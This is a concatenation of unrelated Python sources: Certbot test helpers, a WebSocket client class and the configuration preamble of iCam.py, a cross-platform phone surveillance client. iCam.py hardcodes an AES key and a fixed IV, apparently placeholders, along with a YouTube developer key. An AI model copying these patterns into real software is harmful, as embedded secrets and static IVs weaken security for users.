necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
filesystem.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else {'freeze', }
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
return object.__setattr__(self, name, value)
def _create_get_utility_mock():
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: E1120
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: E1120
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Cleanup opened resources after a test. This is usually done through atexit handlers in
# Certbot, but during tests, atexit will not run registered functions before tearDown is
# called and instead will run them right before the entire test process exits.
# It is a problem on Windows, that does not accept to clean resources before closing them.
logging.shutdown()
# Remove logging handlers that have been closed so they won't be
# accidentally used in future tests.
logging.getLogger().handlers = []
util._release_locks() # pylint: disable=protected-access
shutil.rmtree(self.tempdir)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object."""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def _handle_lock(event_in, event_out, path):
"""
Acquire a file lock on given path, then wait to release it. This worker is coordinated
using events to signal when the lock should be acquired and released.
:param multiprocessing.Event event_in: event object to signal when to release the lock
:param multiprocessing.Event event_out: event object to signal when the lock is acquired
:param path: the path to lock
"""
if os.path.isdir(path):
my_lock = lock.lock_dir(path)
else:
my_lock = lock.LockFile(path)
try:
event_out.set()
assert event_in.wait(timeout=20), 'Timeout while waiting to release the lock.'
finally:
my_lock.release()
def lock_and_call(callback, path_to_lock):
"""
Grab a lock on path_to_lock from a foreign process then execute the callback.
:param callable callback: object to call after acquiring the lock
:param str path_to_lock: path to file or directory to lock
"""
# Reload certbot.util module to reset internal _LOCKS dictionary.
reload_module(util)
emit_event = Event()
receive_event = Event()
process = Process(target=_handle_lock, args=(emit_event, receive_event, path_to_lock))
process.start()
# Wait confirmation that lock is acquired
assert receive_event.wait(timeout=10), 'Timeout while waiting to acquire the lock.'
# Execute the callback
callback()
# Trigger unlock from foreign process
emit_event.set()
# Wait for process termination
process.join(timeout=10)
assert process.exitcode == 0
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
|
main.py | # coding=utf-8
import websocket
from threading import Thread
from ..interfaces import IClient
from poco.utils import six
DEFAULT_ADDR = "ws://localhost:5003"
class WebSocketClient(IClient):
def __init__(self, addr=DEFAULT_ADDR):
super(WebSocketClient, self).__init__()
self.addr = addr
self._inbox = []
self._ws = None
self._ws_thread = None
def connect(self):
if self._ws_thread:
self.close()
print("connecting server..")
self._init_ws_thread()
def send(self, msg):
if not isinstance(msg, six.text_type):
msg = msg.decode("utf-8")
self._ws.send(msg)
def recv(self):
msgs, self._inbox = self._inbox, []
return msgs
def close(self):
print("closing connection..")
self._ws.close()
self._ws_thread = None
def _init_ws_thread(self):
self._ws = self._init_ws()
t = Thread(target=self._ws.run_forever)
t.daemon = True
t.start()
self._ws_thread = t
def _init_ws(self):
ws = websocket.WebSocketApp(self.addr,
on_open=self._on_ws_open,
on_message=self._on_ws_message,
on_error=self._on_ws_error,
on_close=self._on_ws_close)
# ws.enableTrace(True)
return ws
def _on_ws_message(self, ws, message):
self._inbox.append(message)
def _on_ws_error(self, ws, error):
print("on error", error)
self.on_close()
def _on_ws_close(self, ws):
print("on close")
self.on_close()
def _on_ws_open(self, ws):
print('on open')
self.on_connect()
|
iCam.py | """
-----------------------------------------------------------------------------
Copyright (c) 2009-2014 Alexandru Emilian Susu (icam.service@gmail.com).
License: BSD.
Ideas from many :) .
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
The code tries to be PEP8 compliant with one main exception:
- since we have the ambiguity 0 == False, 1 == True (~inherited from C),
when a == 1, "a is True" returns False; a == True returns True
(if a: is evaluated as True, also)
- similarly for a == 0, "a is False" returns False; a == False returns True
Therefore we do not use "is True" (but "== True")
nor "is False" (instead we use "== False").
-----------------------------------------------------------------------------
"""
"""
Platforms supported:
Note that the predicates for the various OS platforms defined in iCam.py are:
ANDROID_OS
RASPBIAN_OS
SYMBIAN_S60_OS
SYMBIAN_UIQ_OS
SYMBIAN_3
iOS_PYOBJC
WINDOWS_OS
WINDOWS_CE_OS_PYTHONCE
You can use the ppp.py tool to obtain from iCam.py a script for only one
(or more) platform.
Examples of how NOT TO use them:
NOT GOOD:
elif SYMBIAN_3
...
elif SYMBIAN_OS and (S60_EDITION[0] >= 3):
...
-instead use:
elif SYMBIAN_OS:
if SYMBIAN_3:
...
else (S60_EDITION[0] >= 3):
...
NOT GOOD:
if ANDROID_OS is False:
...
-instead use:
if ANDROID_OS
pass
else:
...
We use the 3 double-quotes to represent ONLY comments that can be discarded,
and not literal strings.
"""
"""
This Python source file is the cross-platform iCam phone client, working for:
ANDROID_OS
SYMBIAN_S60_OS
SYMBIAN_UIQ_OS
iOS_PYOBJC
WINDOWS_OS
WINDOWS_CE_OS_PYTHONCE.
Note that we make the STRONG assumption that:
- for S60 2nd edition phones we run over PyS60 1.4.5
- for S60 3nd edition phones we run over PyS60 2.0.0 (except Nokia E60 and
E65 on which we cannot install this runtime and we have to use
PyS60 1.4.5; also, maybe, non-Nokia phones such as Samsung G810)
After modifying this file, the easiest way to deploy it is to do the following:
- on Android, after installing iCam.apk, compile into byte-code this file
(normally with Python 2.6) and put the byte-code file
in /sdcard/iCam/a.pyc)
- on S60 3rd edition, after installing iCam[...].sis, you can simply copy
the Python source to [DRIVE]:\Private\e21e55ef\default.py, where
[DRIVE] is the drive where you selected to install the SIS.
- iOS PyObjC - just compile into byte-code (normally with Python 2.5) this
file and replace the old a.pyc with the generated bytecode.
- Windows PythonCE - just compile into byte-code (normally with Python 2.5)
this file and replace the old a.pyc with the generated bytecode.
Also, you ~need to copy the iCam.cfg in the LOCAL_FOLDER of the application.
"""
"""
CRC32 could be added to the BT messages as footer CRC: BUT I DON'T
- BT SMF messages - have already CRC in the state part, which is VERY good, media could be corrupted
- FIL - would be useful - but it is already compressed with zlib
- CMD - not really useful
- TXT - not really useful - if error happens, that's it
- TIM - not required since message does NOT contain data.
"""
CURRENT_RELEASE_TIME = "2017_02_22_08_00_00"
"""
We execute before Main() due to lexical order in the script (even when we import this script):
- a lot of initializations for global vars
- imports, with exception handling
- more complex code (function calls, loops, etc) - these are marked in
the code as "# BEFORE_MAIN:".
"""
"""
New BT packet format: we do not compress BT messages and put footer extra info
in SMF in order to allow playing file even in Inbox
"""
#NEW_BT_FORMAT = False
NEW_BT_FORMAT = True
IMEI_UIQOS = "UIQ-device-id"
IMEI_IOS = "iPhone-device-id"
IMEI_UNIXOS = "*nix-device-id"
IMEI_WinCEOS = "Win-mobile-device-id"
IMEI_WinOS = "Win-device-id"
IMEI_6680 = "668066806680668"
IMEI_6120 = "612061206120612"
IMEI_N95 = "N95N95N95N95N95"
IMEI_N82 = "N82N82N82N82N82"
IMEI_G810 = "300300300300300"
IMEI_E7 = "E7E7E7E7E7E7E7E"
IMEI_HTC_TC = "HTCHTCHTCHTCTCR" #HTC P3650
BT_ADDR_6680 = "66:80:66:80:66:80"
BT_ADDR_6120 = "61:20:61:20:61:20"
BT_ADDR_N82 = "82:82:82:82:82:82"
BT_ADDR_N95 = "95:95:95:95:95:95"
BT_ADDR_HTC_TC = "36:50:36:50:36:50" #HTC P3650
BT_ADDR_RPI = "PI:PI:PI:PI:PI:PI"
WIFI_ADDR_N82 = "WI:FI:WI:FI:WI:FI"
# PHONE NUMBER which we call (can be a landline number also).
ALARM_PHONE_NUMBER = "+01234567890" # "+01234567890" #"1234567890"
# PHONE NUMBER which we call or send SMS to.
ALARM_SMS_PHONE_NUMBER = "+01234567890"
# Used by StoreLocalConfigInFile() and GetGooglePassword()
# A 32 bytes long randomly generated (by hand :) ) secret key
AES_SECRET_KEY = "12345678901234567890123456789012"
# AES_SECRET_KEY = AES_SECRET_KEY[:32]
# From C:\Python25\Lib\site-packages\gdata\tlslite\utils\cipherfactory.py
# "param IV: A 16 byte string"
AES_IV = "1234567890123456"
# Used in IQEnginesPhotoUpload().
IQE_KEY = ""
IQE_SECRET = ""
# Used in ConnectToYouTubeGData(), YouTubeVideoUpload()
#YOUTUBE_TEST_CLIENT_ID = ""
YOUTUBE_TEST_CLIENT_ID = "ytapi-pythonclientlibrary_servicetest"
# Used in ConnectToYouTubeGData(), YouTubeVideoUpload()
# Mobile ReVival YouTube developer key
#youtubeDeveloperKey = ""
youtubeDeveloperKey = "AI39si6eJ7T_TA4Xwl-jZkLDjxi83JPvhgt46Q6k_QfCRWbpW5izuvHCDIw6hjC_CDzyhfPIbisquvtcj0mlotr6ejJGSXA_lg"
"""
It seems that the main overhead is not the display but the storage, Inet
transmission and maybe the detection algorithm.
"""
NUM_FRAMES_TO_UPDATE_VIEWFINDER_EVERY = 1 # 10
startViewfinderBeforeTakingPhoto = 0 # 1
ADD_VIDEO_TO_PLAYLIST = False
BATTERY_LEVEL_THRESHOLD = 40
# PyUIQ 0.2?? uses Python 2.2.2 (PyS60 1.3.18).
# The modules telephone, sysinfo, camera, audio are not working.
###############################################################################
###############################################################################
###############################################################################
###########################PLATFORM DEPENDENT ISSUES###########################
###############################################################################
###############################################################################
import os
import sys
# TODO (low-priority): discover more reliable if we run on RPi or not
# See http://www.raspberrypi.org/forums/viewtopic.php?f=32&t=54413 for other ideas - /proc/cpuinfo
try:
import RPi.GPIO
RASPBIAN_OS = True
except:
RASPBIAN_OS = False
# sys.path.insert(0, "E:\\lib.zip")
#import traceback #!!!!TODO: remove
try:
try:
import android
#print "dir(android) =", dir(android)
myDroid = android.Android()
ANDROID_OS_QPYTHON = False
except:
#traceback.print_exc()
import androidhelper
myDroid = androidhelper.Android()
ANDROID_OS_QPYTHON = True
ANDROID_OS = True
#myDroid.makeToast("Alex test.") # This works here OK
except:
#traceback.print_exc()
#print "Couldn't import androidhelper module."
ANDROID_OS = False
try:
import objc
iOS_PYOBJC = True
except:
#print("Couldn't import the android module.")
iOS_PYOBJC = False
"""
We add lib_std.zip in the sys.path to be able to import the GData API
library, which we install apriori in the current directory.
"""
# sys.path.insert(0, os.getcwd())
# sys.path.insert(0, os.path.join(os.getcwd(), "gdata.zip"))
#if ANDROID_OS == False:
if ANDROID_OS:
pass
elif iOS_PYOBJC:
# So far, sys.path[0] was
# '/private/var/stash/Applications.k14UJu/HelloPython.app' and
# os.getcwd() returns "/". But I fear!!!! that this is not always
# like this.
# sys.path.insert(0, os.path.join(sys.path[0], "lib_std.zip"))
sys.path.append(os.path.join(sys.path[0], "lib_std.zip"))
else:
# This includes Symbian, in general (although PyS60 1.4.5 can't read the ZIP)
sys.path.insert(0, os.path.join(os.getcwd(), "lib_std.zip"))
# print "sys.path = ", sys.path
# sys.stdout.flush()
SYMBIAN_OS = False
SYMBIAN_S60_OS = True
SYMBIAN_UIQ_OS = False # True
SYMBIAN_S60_2ND_ED = False
SYMBIAN_S60_3RD_ED = False
SYMBIAN_1 = False
SYMBIAN_3 = False
try:
import e32
# Both PyS60 and PyUIQ have the e32 module --> SYMBIAN_OS = True for
# both S60 and UIQ.
SYMBIAN_OS = True
S60_EDITION = e32.s60_version_info
if ((S60_EDITION[0] == 5) and (S60_EDITION[1] == 3)) or \
((S60_EDITION[0] == 5) and (S60_EDITION[1] == 2)):
# Symbian Belle
# What is the value for Symbian Anna?
SYMBIAN_3 = True
else:
SYMBIAN_3 = False
if S60_EDITION[0] == 5 and S60_EDITION[1] < 2:
SYMBIAN_1 = True
else:
SYMBIAN_1 = False
if S60_EDITION[0] == 3:
SYMBIAN_S60_3RD_ED = True
else:
SYMBIAN_S60_3RD_ED = False
if S60_EDITION[0] == 2:
SYMBIAN_S60_2ND_ED = True
else:
SYMBIAN_S60_2ND_ED = False
except:
"""
if MY_DEBUG_STDERR:
traceback.print_exc()
sys.stderr.flush()
"""
# print "Couldn't import Symbian PyS60 module e32."
SYMBIAN_OS = False
SYMBIAN_S60_OS = False
SYMBIAN_UIQ_OS = False
WINDOWS_OS = False
WINDOWS_CE_OS_PYTHONCE = False
try:
if sys.platform == "win32":
if os.path.exists("/Storage Card"):
print "Running on Win32 (WinCE)"
WINDOWS_CE_OS_PYTHONCE = True
else:
print "Running on Win32 (Win for desktop :) )"
WINDOWS_OS = True
except:
print("Error around sys.platform.")
#UNIX_OS = True
UNIX_OS = False
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
##############################START PROGRAM####################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# Important vars:
"""
I currently use this for Nokia 6680 and N95, when in BT client mode, since I want:
- not to resize photos but send them original (since 6680 has little mem
and might go Out of memory),
- the state.bin and log files are stored on E:
BUT
- the photos need to be saved in D: since E: sometimes gives
error messages
- to erase the media file after sending it (even if not successful??).
This instructs phone not to resize photos taken and send them
at original resolution directly.
"""
MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = False
MY_DEBUG_STDOUT = True
MY_DEBUG_STDERR = True
MY_DEBUG_STDERR_2 = True
# For uploaded log messages
MY_DEBUG_UPLOAD_MSG = True
#USE_ICAM_SERVER = True
#USE_ICAM_SERVER = False
MEGA_BYTE = 1024 * 1024
# import os.path
if SYMBIAN_OS:
#try:
import appuifw
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# Even if PyUIQ 2.0 has libs\sysinfo.py it doesn't have _sysinfo.pyd
import sysinfo
#except:
# DebugPrintErrorTrace()
def DoesDriveExist(driveStr):
"""
if MY_DEBUG_STDOUT:
print "e32.drive_list() =", e32.drive_list()
print "os.path.exists('E:\\') =", os.path.exists("E:\\")
print "sysinfo.free_drivespace() =", sysinfo.free_drivespace()
sys.stdout.flush()
"""
# Inspired from IYouIt :)
if os.path.exists(driveStr + "\\") and \
(unicode(driveStr) in e32.drive_list()) and \
sysinfo.free_drivespace().has_key(unicode(driveStr)):
return True
return False
# DoesDriveExist("E:")
LOCAL_DRIVE = ""
LOCAL_FOLDER_TEMP = None
# define ANDROID_OS
# ifdef ANDROID_OS
# endif
if SYMBIAN_OS:
# if SYMBIAN_OS and SYMBIAN_S60_OS:
LOCAL_FOLDER_TEMP = "D:/iCam"
if SYMBIAN_UIQ_OS:
if os.path.exists("D:\\"):
LOCAL_DRIVE = "D:"
elif DoesDriveExist("E:"):
LOCAL_DRIVE = "E:"
elif DoesDriveExist("F:"):
LOCAL_DRIVE = "F:"
elif DoesDriveExist("C:"):
appuifw.note(u"No E or F drives found. Using drive C to store " \
"iCam folder.", "info")
LOCAL_DRIVE = "C:"
else:
appuifw.note(u"There are no C, E or F drives on this system :O ...",
"info")
LOCAL_DRIVE = ""
elif ANDROID_OS:
# """
if os.path.exists("/mnt/sdcard/extsd"): # /sdcard/extsd
LOCAL_DRIVE = "/mnt/sdcard/extsd"
elif os.path.exists("/mnt/sdcard/external_sd"):
LOCAL_DRIVE = "/mnt/sdcard/external_sd"
elif os.path.exists("/sdcard"):
LOCAL_DRIVE = "/sdcard"
else:
LOCAL_DRIVE = "/" #!!!! should it be "" - cause we add "/iCam", etc at it?!!!!
elif iOS_PYOBJC:
# It seems /tmp is erased on iOS upon reboot :)
# if os.path.exists("/tmp"):
# LOCAL_DRIVE = "/tmp"
# The bigger drive is at /private/var which is sym-linked at /var
# (df -H reports:
# /dev/disk0s2 3.6G 287M 3.3G 9% /private/var)
# Note: the CameraRoll stores photos in /var/mobile/Media/DCIM/100APPLE/
if os.path.exists("/var/mobile"):
LOCAL_DRIVE = "/var/mobile"
else:
# It seems I don't have access to create "/iCam"!!!!
LOCAL_DRIVE = "/"
elif WINDOWS_OS:
if os.path.exists("Z:\\"):
LOCAL_DRIVE = "Z:"
else:
LOCAL_DRIVE = "C:"
if os.path.exists("R:\\iCam"):
LOCAL_FOLDER_TEMP = "R:\\iCam"
elif os.path.exists("Z:\\iCam"):
LOCAL_FOLDER_TEMP = "Z:\\iCam"
else:
LOCAL_FOLDER_TEMP = "C:\\iCam"
elif UNIX_OS:
LOCAL_DRIVE = "." # "./"
elif WINDOWS_CE_OS_PYTHONCE:
if os.path.exists("/Storage Card"):
# Note: \Storage Card/iCam/Unsent works on PythonCE
# (e.g., Z:\1PhD\ReVival\Logs\WinCE\2011_03_21)
# (but \Storage Card/iCam/Unsent/2011_03_20_23_51_49_000.txm
# doesn't - e.g., in
# Z:\1PhD\ReVival\Logs\WinCE\WiFi_not_working\stderr_2011_03_20_23_51_45.txt)
LOCAL_DRIVE = "/Storage Card"
else:
#LOCAL_DRIVE = "/" # "\\My Device"
LOCAL_DRIVE = "" # "\\My Device"
elif RASPBIAN_OS:
LOCAL_DRIVE = "/home/pi" # "./"
LOCAL_FOLDER_TEMP = "/run" #/1 and do also: os.system("sudo mkdir %s" % TEMP_FOLDER) and os.system("sudo chmod 777 %s" % TEMP_FOLDER)
ICAM_APP_TITLE = u"iCam"
MENU_SELECT_PREFIX = "* "
# LOCAL_FOLDER = "E:/ReVival"
# LOCAL_FOLDER = "F:/iCam"
LOCAL_FOLDER = LOCAL_DRIVE + "/iCam"
if LOCAL_FOLDER_TEMP is None:
LOCAL_FOLDER_TEMP = LOCAL_FOLDER
"""
This is useful in case we have pauseInterval == 0, since it allows very fast
writing of files (JPEGs and .smf, etc).
"""
# LOCAL_FOLDER = "D:/iCam"
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
LOCAL_FOLDER_SENT_LOGS = LOCAL_FOLDER + "/LogsSent"
WINCE_MEDIA_FOLDER = "/Storage Card/DCIM/100MEDIA"
WINCE_SENT_MEDIA_FOLDER = WINCE_MEDIA_FOLDER + "/Sent"
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = False
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
STATE_FILENAME = "state.bin"
STATE_BACKUP_EXTENSION = ".bak"
STATE_PATH_FILENAME = LOCAL_FOLDER + "/" + STATE_FILENAME
STATE_PATH_FILENAME_BACKUP = STATE_PATH_FILENAME + STATE_BACKUP_EXTENSION
LOCAL_CONFIG_FILENAME = "iCam.cfg"
LOCAL_CONFIG_PATH_FILENAME = LOCAL_FOLDER + "/" + LOCAL_CONFIG_FILENAME
STDERR_FILENAME_PREFIX = "stderr_"
STDOUT_FILENAME_PREFIX = "stdout_"
INTRANET_SERVER = False
#INTRANET_SERVER = True
USE_ICAMSRV_GAE = False
#USE_ICAMSRV_GAE = True
ICAM_GAE_SERVER_NAME = "icamsrv.appspot.com"
if INTRANET_SERVER == False:
if USE_ICAMSRV_GAE == False:
ICAM_SERVER_NAME = "titansusu.go.ro" #"mobile-revival.110mb.com"
WEB_FOLDER = "/ReVival"
"""
ICAM_SERVER_NAME = "alexsusu.110mb.com"
WEB_FOLDER = "/iCam"
"""
else:
ICAM_SERVER_NAME = ICAM_GAE_SERVER_NAME
WEB_FOLDER = ""
else:
if USE_ICAMSRV_GAE == False:
# ICAM_SERVER_NAME = "83.149.75.83"
# ICAM_SERVER_NAME = "aes123.110mb.com"
"""
ICAM_SERVER_NAME = "192.168.2.205" # Titan WiFi
WEB_FOLDER = "/ReVival"
"""
pass
else:
ICAM_SERVER_NAME = "localhost:8080"
WEB_FOLDER = ""
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + "/UploadBinary.php"
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + "/UploadStateAndFile.php"
if USE_ICAMSRV_GAE:
WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + "/proxyyoutube"
else:
WEBPAGE_UL_GZIPPED_STATE_AND_FILE = WEB_FOLDER + \
"/UploadGzippedStateAndFile.php"
WEBPAGE_UL_GZIPPED_STATE_AND_FILE_PROXY_YOUTUBE = "/proxyyoutube"
WEBPAGE_UL_GZIPPED_FILE = WEB_FOLDER + "/UploadFile.php"
# WEBPAGE_DL_GZIPPED_TEXT
WEBPAGE_DL_GZIPPED_FILE = WEB_FOLDER + "/DownloadFile.php"
# WEBPAGE_UL_GZIPPED_TEXT = "/video_surveillance_mobile_text.php"
if USE_ICAMSRV_GAE:
WEBPAGE_UL_GZIPPED_TEXT = WEB_FOLDER + "/uploadgzippedtext"
else:
WEBPAGE_UL_GZIPPED_TEXT = WEB_FOLDER + "/UploadGzippedText.php"
# WEBPAGE_DL_COMMAND_FILE = "/WiSurveillance/cmd.txt"
# WEBPAGE_DL_COMMAND_FILE = "/cmd.txt"
# WEBPAGE_DL_COMMAND_FILE = "/cmd.php"
WEBPAGE_DL_COMMAND_FILE = WEB_FOLDER + "/cmd.php"
# BT_OBEX_FILENAME_PREFIX = "sLog_"
#BT_OBEX_FILENAME_PREFIX = "iCam_"
BT_OBEX_FILENAME_PREFIX = "iC_"
# Used when NEW_BT_FORMAT == False:
BT_OBEX_FILENAME_PREFIX_TYPE_CMD = "CMD_"
BT_OBEX_FILENAME_PREFIX_TYPE_FIL = "FIL_"
BT_OBEX_FILENAME_PREFIX_TYPE_SMF = "SMF_"
BT_OBEX_FILENAME_PREFIX_TYPE_TXT = "TXT_"
COMMANDS_FILENAME = "cmd.txt"
# These are extensions for files transferred via Internet (not BT):
EXTENSION_COMMAND_MESSAGE = ".cmd"
# "fil" comes from arbitrary file - used for Unsent, Bluetooth, etc
EXTENSION_ARBITRARY_FILE = ".fil"
# "smf" comes from state and media file. These files are used for
# Unsent (own files and for Bluetooth client).
EXTENSION_STATE_AND_MEDIA_FILE = ".smf"
# Text message (normally should be compressed, that's why it's not ".txt").
EXTENSION_TEXT_MESSAGE = ".txm"
# These are extensions for files transferred via BT:
BT_OBEX_EXTENSION_TXT = ".txt"
BT_OBEX_EXTENSION_CMD = ".cmd.txt"
BT_OBEX_EXTENSION_TIM = ".tim" # time sync message
##
#BT_OBEX_EXTENSION_LIST_CMD = [EXTENSION_COMMAND_MESSAGE]
BT_OBEX_EXTENSION_LIST_CMD = [BT_OBEX_EXTENSION_CMD]
BT_OBEX_EXTENSION_LIST_FIL = [EXTENSION_ARBITRARY_FILE]
#BT_OBEX_FILENAME_EXTENSION_TYPE_SMF = [".jpg", ".png", ".3gp", ".mp4", ".amr"]
BT_OBEX_EXTENSION_LIST_SMF = [".jpg", ".png", ".3gp", ".mp4", ".amr"]
#BT_OBEX_EXTENSION_LIST_TXT = [EXTENSION_TEXT_MESSAGE]
BT_OBEX_EXTENSION_LIST_TXT = [BT_OBEX_EXTENSION_TXT]
changedConserveEnergy = False
conserveEnergy = False
# 0 - None, 1 - All; 2 - wo .txm
saveUnsentPackets = 0
# saveUnsentPackets = True
"""
uploadUnsentData means:
0 - send none;
1 - send unsent files from Unsent (excepting .txm unsent files);
2 - send unsent logs;
3 - send ALL (excepting .txm unsent files)
"""
uploadUnsentData = 0
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS = 1 # 10
"""
Sensing accelerator (it is called 35?? times / sec) and rotation slows
down iCam.
"""
logAccelerometerAndRotationSensors = False
startAutomatically = 0 # False
startButtonPressed = False
reactiveLoopIsStarted = False
"""
# It is stored as an int in the iCam state.
Note that we use it also to store for fact IMEI_N82 phone sent (or not) to
IMEI_6680 the fact that its charger power went down (we assume both phones
are connected at the same "power source"), in SleepAndPetWatchdog().
"""
reactiveLoopOpsIndex = 0
sentBTMessageTo6680 = 0
"""
Map from BT-MAC-address (NOT btClientDeviceId) to OPP-service-port number
"""
#bluetoothServerOPPServicePort = -1
bluetoothServerOPPServicePort = {}
###############################################################################
